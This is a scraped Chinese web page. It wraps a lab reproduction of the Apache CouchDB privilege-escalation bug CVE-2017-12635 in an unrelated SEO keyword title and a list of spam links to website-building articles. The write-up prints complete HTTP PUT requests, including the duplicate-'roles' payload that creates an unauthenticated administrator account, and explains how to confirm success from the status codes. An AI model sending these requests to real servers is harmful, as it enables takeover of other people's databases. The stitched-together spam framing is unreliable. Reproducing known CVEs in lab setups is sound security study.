当前位置: 首页 > news >正文

专门做评论的网站杭州高瑞网站建设

专门做评论的网站,杭州高瑞网站建设,企业网站seo诊断工具,网站建设补助Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现 漏洞名称影响版本影响版本 漏洞复现环境搭建漏洞利用 总结 漏洞名称 影响版本 Apache CouchDB是一个开源的NoSQL数据库#xff0c;专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式… Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现 漏洞名称影响版本影响版本 漏洞复现环境搭建漏洞利用 总结 漏洞名称 影响版本 Apache CouchDB是一个开源的NoSQL数据库专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式javascript作为查询语言MapReduce和HTTP作为API的NoSQL数据库。 在2017年11月15日CVE-2017-12635和CVE-2017-12636披露CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员属于垂直权限绕过漏洞。 影响版本 Apache CouchDB 1.7.0 / 2.x 2.1.1 漏洞复现 环境搭建 vulhub链接 https://vulhub.org//#/environments/couchdb/CVE-2017-12635/启动vulhub docker-compose up -d 环境启动后访问http://192.168.63.129:5984/_utils/即可看到一个web页面说明Couchdb已成功启动。 漏洞利用 PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 90{type: user,name: vulhub,roles: [_admin],password: vulhub }返回403错误提示 {“error”:“forbidden”,“reason”:“Only _admin may set roles”}只有管理员才能设置Role角色 这个时候我们利用 Erlang和JavaScript 处理 JSON 的特性发送包含两个roles的数据包即可绕过限制 PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 108{type: user,name: vulhub,roles: [_admin],roles: [],password: vulhub }验证是否成功 且在创建一个成功后再重复发包也会报错409修改已创建的密码也不行 总结 在JavaScript在解析时会把roles: [“_admin”],“roles”: [],解析为roles: []用来检测创建角色的权限其值为空使用PUT方法上传时服务器时检测权限为空即可绕过安全限制并通过使用Erlang部分实现身份验证和授权通过getter函数返回第一个值为“roles”: [“_admin”]并创建具有管理员的用户wahaha:wahaha。如果攻击成功在响应头中的状态码为201且在响应体中返回org.couchdb.user字样或在响应头中返回409状态码在响应体中返回Document update conflict字样。
http://www.dnsts.com.cn/news/8814.html

相关文章:

  • 网站防止挂马应该怎么做个人网站做app上传
  • 网站建设专业企业网站建设总结报告
  • 手机端做的优秀的网站51网址还有吗
  • html网站设计论文龙岗网站设计机构
  • 怎样做php网站深圳网站公司排名
  • 哪些网站可以做电脑画画赚钱推广自身网站
  • 做一个网站得做多少个页面免费有趣的网址
  • 制作网站的平台公司怎么样做网站
  • 珠海网站开发公司哪家好app要多少钱才能开发
  • 中国知名网站排行榜网页设计师的职业规划
  • 沈阳网站制作策划域名备案网站建设方案书
  • 做问卷调查赚钱的网站装修设计师网站
  • 关于网站建设的大学网站后台是怎么做出来的
  • 国外网站的分析工具有哪些表情制作在线生成器
  • wordpress收费主题破解版东莞百度seo排名
  • 网站建设实训的意义检查网站是否做网站地图
  • 怎么免费做网站推广科技有限公司简介
  • 什么是网站和网页广州市网站建设科技公司
  • 高端网站开发建设合肥网页定制
  • 3322做网站国内flex做的网站
  • 网站建设公司需要什么网络营销渠道的功能包括
  • 响应式网站的几种尺寸重启wordpress
  • 全新升级网站宁波网站建设哪里好
  • ai设计网站东莞横沥电子厂
  • 企业网站托管有必要吗网页制作软件手机版
  • 网站美工设计流程求婚策划公司
  • 和男朋友都是第一次做网站enfold wordpress主题
  • 江苏扬州建设局网站开源商城cms
  • 运城 网站制作企业手机网站设计
  • 可以做的电影网站优化方案2022